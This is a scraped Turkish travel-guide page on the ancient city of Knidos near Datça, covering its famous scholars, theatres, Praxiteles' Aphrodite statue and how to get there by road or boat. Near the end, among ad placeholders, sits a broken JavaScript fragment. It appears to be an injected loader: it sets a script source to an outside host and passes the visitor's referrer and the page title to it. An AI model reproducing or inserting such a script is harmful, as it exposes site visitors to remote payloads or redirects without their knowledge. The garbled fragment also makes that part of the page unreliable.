Buradasınız: Ana sayfa - Datça Otelleri - Datça Knidos Rehberi

Datça Knidos Rehberi

300x250 reklam kodu buraya Knidos bilim, mimarlık ve sanatta da ileri bir kentti. Tarihin büyük astronomi ve matematik bilimcisi Eudoksus, doktor Euryphon, ünlü ressam Polygnotos ve dünyanın yedi harikasından biri sayılan İskenderiye Feneri’nin mimarı Sostratos burada yaşadı.

knidos datca Datça Knidos Rehberi

Doktor Euryphon ve öğrencileri zamanının ikinci büyük tıp okulunu Knidos’ta kurdular.

Eudoksus’un geliştirdiği ve dönemin büyük buluşu olan güneş saati, ören yerinde bugün de görülebiliyor.

Knidos bölgenin en etkileyici ören yeridir. Mutlaka bir fırsatını bulup görmelisiniz.

Knidos daha önce bugünkü Datça ilçe merkezinin 1.5 km kuzeydoğusunda Dalacak burnu üzerindeki Burgaz mevkiinde kurulmuştu. Sonra Yarımadanın batı ucundaki Tekir Burnu üzerine taşındı.

300x250 reklam kodu buraya
Karadan, kendi aracınızla Knidos’a gidecekseniz eğer, Datça’dan Marmaris yönüne doğru çıkacaksınız, Knidos sapağından sola dönüp 33 Km. kadar gideceksiniz. Yol ören yerine kadar yapılıp asfaltlandı. Ören yeri girişinden sonra yürüyeceksiniz.

Knidos’un biri 20.000 diğeri 5.000 kapasiteli iki tiyatrosu var. Güneyde, ticari limanın yakınındaki küçük olanı. Akropoldeki büyük tiyatro ise, taşları ve mermerleri 19. yüzyılda gemilerle götürüldüğü için bugüne ulaşamamış.

datca knidos Datça Knidos Rehberi

ÇIPLAK AFRODİT HEYKELİ

Sponsor bağlantılar

468x15 reklam kodu buraya
Knidos antik çağda en çok Çıplak Aphrodite heykeli ile ünlenmiş. Praksiteles’in yaptığı heykel o kadar güzelmiş ve o kadar ünlenmiş ki, heykeli görmeye başka kentlerden insanlar gelirmiş. O zamana kadar tanrı heykelleri çıplak yapılır ama tanrıça heykellerinin sadece gerdan ve bir göğsü açık olurdu. Dünyadaki ilk çıplak tanrıça heykeli buydu. Knidoslular parlak dönemleri geride kalıp yoksullaştıklarında bile Bithynia Kralının büyük para önerisini geri çevirip heykelleriyle birlikte sıkıntıya katlanmayı seçtiler. Bu heykel bu güne kadar bulunamadı ama bir benzeri yerinde duruyor. 1967-77 yılları arasında Amerikalılar heykeli bulmak için sondaj kazıları yaptılar. Sonra sondaj kazıları Türkiye tarafından yasaklandı.

NASIL GİDİLİR ?

Marmaris- Datça arası, 70 Km. lik düzgün bir asfalta sahip. Datça’dan Knidos Antik Kentinin bekçi kulübesine 35 Km. lik asfalt yolla ulaşıyorsunuz. Yolun son 7 Km.lik bölümü asfalt olmasına rağmen epey dar sayılır. Yolun muhteşem manzarasını varsın yanınızdakiler seyretsin. Sürücünün yola dikkatinde fayda var. Datça’dan her sabah Knidos’a gezi tekneleri kalkıyor. Muhteşem koylara da uğrayan tekneler, akşamüstü geri dönüyorlar. Bir tavsiye; tekneyle gidecekseniz, havanın iyi olduğundan emin olun. Yoksa Knidos’ta indiğinizde toprağı öpebilirsiniz.

Sponsor bağlantılar

468x15 reklam kodu buraya

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

} else {} else {

Etiketler:, , , , , , , , , , , , ,

Comments are closed.